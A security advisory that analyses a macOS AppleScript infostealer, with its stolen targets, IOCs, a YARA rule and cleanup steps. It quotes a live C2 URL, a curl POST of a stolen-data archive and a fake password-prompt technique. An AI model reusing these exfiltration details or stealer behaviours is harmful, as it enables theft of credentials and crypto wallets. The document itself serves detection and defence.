Highly Malicious MacOS Infostealer

To anyone who may have unsuspectingly followed the prompts, this is what would have happened.

If the downloaded script had been left to run, it would have:

• Stolen sensitive files (passwords, cookies, keychains, browser data).

• Exfiltrated browser-stored credentials and cookies (Chrome, Firefox, Safari, Brave, etc.).

• Extracted cryptocurrency wallet data (MetaMask, Electrum, Exodus, Binance, Ledger, Trezor, etc.).

• Compressed the data into a ZIP file.

• Exfiltrate the stolen data to a remote command and control (C2) server:
  https//meshsorterio[dot]com/api/data/receive

• Deleted local traces of its activity afterward.

Detailed breakdown of the script functions

☠️ Malicious Functions and Behaviors

🛑 Credential Theft

• getpwd() tries to access stored passwords or prompt the user for their macOS password via a fake dialog ("Application wants to install helper").

• Uses dscl . authonly to validate entered credentials.

• Stores password in ~/.pwd and /tmp/lovemrtrump/ggwp.

🛑 File and Wallet Exfiltration

• GrabFolder() / readwrite() steal specific browser, wallet, and keychain files.

• Targets wallets like MetaMask, Electrum, Exodus, Atomic, Wasabi, Monero, Ledger, Trezor, and more.

• Also harvests files with sensitive extensions: .wallet, .key, .kdbx, .docx, .pdf, etc.

🛑 Safari, Chrome, Firefox Data Theft

• chromium() and parseFF() functions target Chrome-like and Firefox-based browsers to extract:

  • Cookies

  • Login Data

  • IndexedDB storage

  • Extension data

• Also targets Safari cookies and Notes app data.

🛑 Network Exfiltration

• Uses curl to POST stolen ZIP archive to:

https//meshsorterio[dot]com/api/data/receive

🛑 Evasion and Cleanup

• Deletes /tmp/lovemrtrump/ and the exfiltration ZIP file after completion:

⚠️ Red Flags and Indicators of Compromise

• Phishing-style prompt for macOS login password (display dialog)

• Targeting of known wallet and credential files

• Automated network exfiltration via cURL

• Obfuscation using helper functions and exception lists

• Hardcoded path /tmp/lovemrtrump/ used as staging area

• C2 Domain: meshsorterio.com (suspicious, likely compromised or attacker-controlled)

🧯 If You’ve Found This Script on a System

1. Disconnect from the network immediately

2. Do NOT enter any password when prompted

3. Scan system for IOCs (indicators of compromise):

   • /tmp/lovemrtrump/

   • ~/.pwd, ~/.username

   • Any file or directory created recently in Application Support, Library, Keychains

4. Change passwords immediately, especially Apple ID and cryptocurrency wallets.

Below is a list of IOCs and a Yara Rule to detect it:

🔍 Indicators of Compromise (IOCs)

🧠 Behavioral

Indicator	Description
Prompt: "Required Application Helper. Please enter device password to continue."	Fake macOS password dialog
Folder: /tmp/lovemrtrump/	Working/staging directory for stolen data
File: /tmp/out.zip	Compressed archive of stolen data
File: ~/.pwd	Stores captured macOS password
File: ~/.username	Stores current system username
File I/O into: Cookies.binarycookies, NoteStore.sqlite, login.keychain-db	Stolen Safari, Notes, and Keychain data
Extension harvesting: Chrome, Brave, Edge, Opera	Targets known extension and IndexedDB paths
Files harvested: .wallet, .key, .pdf, .docx, .kdbx, .txt, .jpeg, .jpg, etc.	Sensitive personal or crypto-related data
Tools used: curl, dscl, security, system_profiler, ditto

 

🌐 Network IOCs

Type	Value
URL	[https://meshsorterio[dot]com/api/data/receive]
HTTP Header	X-Bid: f48fbe39836779cadbf148b5952919fd
HTTP Method	POST with multipart form (-F "lil-arch=@/tmp/out.zip")
User-agent	Unspecified, defaults to cURL

Type	Value
URL	https://meshsorterio.com/api/data/receive
HTTP Header	X-Bid: f48fbe39836779cadbf148b5952919fd
HTTP Method	POST with multipart form (-F "lil-arch=@/tmp/out.zip")
User-agent	Unspecified, defaults to cURL

🧪 File Paths (Stolen Targets)

Some examples among many:

• ~/Library/Application Support/Google/Chrome/...
• ~/Library/Application Support/BraveSoftware/Brave-Browser/...
• ~/Library/Application Support/atomic/Local Storage/leveldb/
• ~/Library/Application Support/Exodus/
• ~/Library/Group Containers/group.com.apple.notes/NoteStore.sqlite
• ~/Library/Keychains/login.keychain-db
• ~/Library/Containers/com.apple.Safari/Data/Library/Cookies/Cookies.binarycookies

🔐 YARA Rule

Here is a YARA rule tailored to detect this specific AppleScript on disk or in memory:

yara

CopyEdit

rule OSX_CryptoStealer_Lovemrtrump

{

    meta:

        description = "Detects macOS AppleScript-based crypto wallet and password stealer"

        author = "Cyooda Security"

        date = "2025-06-18"

        malware_family = "OSX.Lovemrtrump.Stealer"

        threat_level = 5

    strings:

        $str1 = "Application wants to install helper"

        $str2 = "/tmp/lovemrtrump/"

        $str3 = "/tmp/out.zip"

        $str4 = "Cookies.binarycookies"

        $str5 = "NoteStore.sqlite"

        $str6 = "login.keychain-db"

        $str7 = "https://meshsorterio.com/api/data/receive"

        $str8 = "set result to do shell script \"dscl . authonly"

        $str9 = "MetaMask"

        $str10 = "display dialog"

    condition:

        6 of ($str*)

}

Conclusion

Although this script was written for an Apple Mac, similar versions are also available for Microsoft Windows computers.  Be on the lookout for this, and if you see it and it feels suspicious, do not proceed to open a command prompt and type in whatever it tells you.